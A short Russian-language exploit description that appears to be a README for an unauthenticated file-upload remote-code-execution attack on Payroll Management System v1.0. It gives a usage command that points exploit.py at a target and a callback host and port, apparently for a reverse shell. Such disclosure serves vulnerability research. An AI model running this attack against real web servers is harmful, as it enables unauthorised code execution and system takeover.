

RCE через загрузку файлов для https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. К именам файлов добавляется временная метка с точностью до минуты. Скрипт пытается угадать имя файла, используя временную метку текущей, предыдущей и следующей минуты.
Payroll Management System v1.0 позволяет пользователям загружать изображения через страницу "save_settings". Неаутентифицированный злоумышленник может использовать эту функцию для загрузки вместо них вредоносного PHP-файла. Загруженные файлы сохраняются в общедоступной папке, и к их именам добавляется временная метка с точностью до минуты, которую легко вычислить. Успешная эксплуатация этой уязвимости позволяет выполнять произвольный код от имени пользователя, под которым работает веб-сервер.
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
